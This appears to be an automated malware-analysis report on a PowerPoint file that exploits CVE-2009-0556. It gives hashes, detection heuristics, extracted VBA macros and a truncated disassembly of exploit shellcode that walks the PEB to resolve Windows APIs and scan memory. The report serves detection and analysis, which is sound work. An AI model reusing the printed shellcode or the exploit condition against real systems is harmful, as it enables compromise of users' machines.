Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 31850d59d19309e4…

MALICIOUS

Office (OLE)

818.5 KB Created: 2008-01-27 01:25:33 Authoring application: Microsoft PowerPoint First seen: 2012-06-30
MD5: 5de89ec7545b90d42c417501a810e948 SHA-1: f9b5b020d96540695d76c9a43ca9daa35b54cb28 SHA-256: 31850d59d19309e48986473b0a57039d893f2643a947f9e6b67b4cadb2ed0bbe
228 Risk Score

Heuristics 6

  • CVE-2009-0556 — PowerPoint malformed ClientTextbox critical CVE exact CVE_2009_0556
    The PowerPoint record graph contains an Escher ClientTextbox with both OutlineTextRefAtom and TextHeaderAtom children. This is the OffVis-compatible structural condition for the PowerPoint memory corruption vulnerability fixed in MS09-017.
  • ClamAV: Ppt.Exploit.Apptom-10029459-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Ppt.Exploit.Apptom-10029459-0
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    x86 disassembly · validity: code (0.83) — 5/6 branch targets land on an instruction boundary (83% coherence)
    00000A05  64a130000000      mov eax, dword ptr fs:[0x30]
    00000A0B  8b400c            mov eax, dword ptr [eax + 0xc]
    00000A0E  8b701c            mov esi, dword ptr [eax + 0x1c]
    00000A11  ad                lodsd eax, dword ptr [esi]
    00000A12  8b7808            mov edi, dword ptr [eax + 8]
    00000A15  8b473c            mov eax, dword ptr [edi + 0x3c]
    00000A18  8b543878          mov edx, dword ptr [eax + edi + 0x78]
    00000A1C  03d7              add edx, edi
    00000A1E  8b5a20            mov ebx, dword ptr [edx + 0x20]
    00000A21  03df              add ebx, edi
    00000A23  33c9              xor ecx, ecx
    00000A25  41                inc ecx
    00000A26  8b348b            mov esi, dword ptr [ebx + ecx*4]
    00000A29  03f7              add esi, edi
    00000A2B  b849734261        mov eax, 0x61427349
    00000A30  3b06              cmp eax, dword ptr [esi]
    00000A32  75f1              jne 0xa25
    00000A34  b864577269        mov eax, 0x69725764
    00000A39  3b4604            cmp eax, dword ptr [esi + 4]
    00000A3C  75e7              jne 0xa25
    00000A3E  8b5a24            mov ebx, dword ptr [edx + 0x24]
    00000A41  03df              add ebx, edi
    00000A43  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    00000A47  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    00000A4A  03df              add ebx, edi
    00000A4C  8b048b            mov eax, dword ptr [ebx + ecx*4]
    00000A4F  03c7              add eax, edi
    00000A51  bf00000030        mov edi, 0x30000000
    00000A56  8bd8              mov ebx, eax
    00000A58  81c700100000      add edi, 0x1000
    00000A5E  6800040000        push 0x400
    00000A63  57                push edi
    00000A64  ff                .byte 0xff
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xlApp = CreateObject("Excel.Application")
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1005 bytes
SHA-256: 7403e4728955600b20e1b11715dae9328df16f95bc7db40bf64d8dfe55835d1d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub AutoOpen()
'Parametre [Fichier PPT] [Nom de la macro]
c = Command()
cl = InStr(c, " ")
c1 = Left(c, cl - 1)
c2 = Right(c, Len(c) - cl)
Dim a As New PowerPoint.Application
a.WindowState = ppWindowMaximized
a.Visible = True
a.Presentations.Open c1
a.Run (c1 & "!" & c2)
Set a = Nothing


End Sub

Dim xlApp As excel.Application
Dim xlBook As excel.workbook

Sub test()

    'lancer le fichier excel
    Set xlApp = CreateObject("Excel.Application")
    Set xlBook = xlApp.workbooks.Open("chemin_du_fichier.xls")
    xlApp.Visible = True
    
End Sub

Sub valid()

    'lancer valider de excel
    xlApp.Run "feuil2.valider"

End Sub

Attribute VB_Name = "Classe1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False